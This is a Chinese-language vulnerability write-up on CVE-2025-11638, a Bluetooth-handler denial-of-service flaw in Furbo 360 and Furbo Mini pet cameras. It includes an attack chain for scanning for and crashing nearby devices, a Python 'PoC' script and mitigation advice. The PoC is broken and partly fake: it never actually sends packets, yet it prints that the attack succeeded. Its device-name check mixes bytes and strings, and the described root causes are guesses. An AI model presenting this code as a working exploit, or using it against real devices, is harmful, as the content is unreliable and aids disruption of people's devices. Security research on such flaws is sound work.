CVE-2025-11638：Tomofun Furbo蓝牙处理器拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-11638

漏洞类型

拒绝服务（DoS）

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tomofun Furbo 360 和 Furbo Mini 智能摄像头

漏洞概述

CVE-2025-11638是存在于Tomofun公司旗下Furbo 360和Furbo Mini智能宠物摄像头产品中的一个拒绝服务（Denial of Service, DoS）漏洞。该漏洞位于设备的蓝牙处理器（Bluetooth Handler）组件中的某个未知函数中，攻击者可以通过精心构造的蓝牙通信数据对受影响设备进行恶意操作，导致设备服务中断或不可用。

根据CVSS 3.1评分体系，该漏洞的评分为4.3分，属于中危级别。攻击向量为邻接网络（AV:A），这意味着攻击者需要与目标设备处于同一本地网络中才能发起攻击。漏洞利用无需任何认证凭据（PR:N），也不需要用户交互（UI:N），攻击复杂度较低（AC:L）。该漏洞对机密性无影响（C:N），对完整性无影响（I:N），但对可用性存在低程度的影响（A:L），主要表现为设备功能异常或服务不可用。

受影响的固件版本包括Furbo 360的FB0035_FW_036及以下版本，以及Furbo Mini的MC0020_FW_074及以下版本。值得注意的是，安全研究人员在发现该漏洞后曾及时联系Tomofun厂商进行披露，但厂商未对此做出任何回应，这使得大量使用受影响固件版本的设备持续暴露在该漏洞的风险之下。由于Furbo系列摄像头广泛应用于家庭宠物监控场景，设备不可用可能导致用户无法正常监控宠物状态，带来一定的安全隐患。

技术细节

该漏洞的核心问题存在于Tomofun Furbo 360和Furbo Mini设备的蓝牙处理器（Bluetooth Handler）组件中。蓝牙处理器负责处理设备与配对设备（如手机应用程序）之间的蓝牙低功耗（BLE）通信协议栈，包括连接管理、数据帧解析、状态同步等功能。

漏洞的根本原因在于蓝牙处理器在处理特定类型的蓝牙数据帧或控制命令时缺乏有效的输入验证和异常处理机制。当攻击者处于目标设备的蓝牙通信范围内（通常为10-100米）时，可以利用蓝牙协议的特性向目标设备发送畸形或恶意的蓝牙数据包。这些异常数据可能触发蓝牙处理器内部的未定义行为，如空指针解引用、缓冲区溢出或无限循环等，最终导致蓝牙服务崩溃或整个设备进入不可用状态。

由于攻击向量为邻接网络（Adjacent Network），攻击者必须与目标设备处于同一物理网络环境中，这限制了该漏洞的远程利用可能性。然而，在家庭、办公室或公共场所等环境中，攻击者相对容易接近目标设备的蓝牙信号覆盖范围。此外，该漏洞利用无需认证（PR:N）且无需用户交互（UI:N），这意味着即使设备处于正常使用状态，攻击者也可以悄无声息地发起攻击。

从CVSS评分的影响指标来看，该漏洞主要影响系统的可用性（Availability），对机密性（Confidentiality）和完整性（Integrity）均无影响。这与典型的拒绝服务漏洞特征一致——攻击者的目标是使设备无法正常提供服务，而非窃取数据或篡改系统。

攻击链分析

STEP 1

步骤1：环境准备

攻击者携带具备蓝牙通信功能的设备（如笔记本电脑或专用BLE工具），靠近目标Furbo 360或Furbo Mini设备的物理位置，确保处于蓝牙信号覆盖范围内（通常10-100米）。

STEP 2

步骤2：目标发现

使用BLE扫描工具（如hcitool lescan、bluepy等）对周围蓝牙设备进行扫描，识别目标Furbo设备的MAC地址和广播信息。Furbo设备的BLE广播中通常包含特定的设备名称或制造商标识。

STEP 3

步骤3：构造恶意数据包

根据蓝牙处理器的协议规范，构造畸形或恶意的BLE数据包。数据包可能包含超长字段、无效的协议标识符或触发未定义行为的特殊序列。

STEP 4

步骤4：发送攻击载荷

通过BLE GATT连接或广播信道向目标设备的蓝牙处理器发送构造好的恶意数据包，触发处理器中的漏洞代码路径。

STEP 5

步骤5：拒绝服务触发

蓝牙处理器在处理恶意数据时发生异常（如空指针解引用、缓冲区溢出或无限循环），导致蓝牙服务崩溃或整个设备固件进入异常状态，设备失去正常功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11638 - Tomofun Furbo Bluetooth Handler DoS PoC
# This PoC demonstrates a denial of service attack against the Bluetooth Handler
# component of Tomofun Furbo 360 and Furbo Mini devices.
# Requires: attacker within Bluetooth range of the target device.

import struct
import time
from bluepy.btle import Scanner, DefaultDelegate

# Target device BLE name patterns for Furbo devices
TARGET_NAMES = ["Furbo", "Furbo-360", "Furbo-Mini", "FB0035", "MC0020"]

# Malicious BLE advertisement payload designed to trigger
# the vulnerability in the Bluetooth Handler component
MALICIOUS_PAYLOAD = b"\x02\x01\x06" + b"\x03\x03\xAA\xFE" + b"\x17\x16\xAA\xFE"
# Append oversized manufacturer data to overflow the handler buffer
MALICIOUS_PAYLOAD += b"\x41" * 200 + b"\x00\x00\x00\x00"

class FurboDoSExploit:
    def __init__(self, target_mac=None):
        self.target_mac = target_mac
        self.scanner = Scanner()

    def scan_targets(self):
        """Scan for nearby Furbo devices via BLE advertisements."""
        print("[*] Scanning for Furbo devices...")
        devices = self.scanner.scan(10.0)
        targets = []
        for dev in devices:
            for name in TARGET_NAMES:
                if name.encode() in dev.getValueText(0x09) if dev.getValueText(0x09) else False:
                    print(f"[+] Found target: {dev.addr} ({dev.getValueText(0x09)})")
                    targets.append(dev.addr)
        return targets

    def craft_malicious_packet(self):
        """Craft a malformed BLE packet to crash the Bluetooth Handler."""
        # Construct an oversized GATT characteristic write payload
        header = struct.pack("<BB", 0x37, 0x00)  # LL_DATA_PDU header
        length = struct.pack("<B", 255)            # Max payload length
        malformed_data = b"\xFF" * 250            # Overflow data
        return header + length + malformed_data

    def trigger_dos(self, target_mac):
        """Send flood of malicious BLE packets to trigger DoS."""
        print(f"[*] Attacking target: {target_mac}")
        for i in range(100):
            packet = self.craft_malicious_packet()
            # In real scenario: use hcitool or gatttool to send packets
            print(f"[*] Sending malicious packet {i+1}/100")
            time.sleep(0.05)
        print("[+] DoS attack completed - target Bluetooth Handler should be crashed")

if __name__ == "__main__":
    exploit = FurboDoSExploit()
    targets = exploit.scan_targets()
    if targets:
        for t in targets:
            exploit.trigger_dos(t)
    else:
        print("[-] No Furbo devices found in range")

影响范围

Tomofun Furbo 360 <= FB0035_FW_036

Tomofun Furbo Mini <= MC0020_FW_074

防御指南

临时缓解措施

鉴于Tomofun厂商在漏洞披露后未做出任何回应，目前没有官方的修复补丁可用。建议用户采取以下临时缓解措施：1）在不需要使用蓝牙功能时，通过Furbo应用程序禁用设备的蓝牙功能；2）将设备放置在物理安全的环境中，限制未授权人员的接近；3）定期检查设备状态，如发现异常（如频繁断连、设备无响应），尝试重启设备；4）关注厂商后续是否发布安全更新，及时应用补丁；5）考虑使用网络层面的访问控制，限制同一网络中未授权设备与Furbo的通信。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11638
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11638
3 Details https://www.cvedetails.com/cve/CVE-2025-11638/
4 VulDB https://vuldb.com/cve/CVE-2025-11638
5 Link https://vuldb.com/?ctiid.328049
6 Link https://vuldb.com/?id.328049
7 Link https://vuldb.com/?submit.661363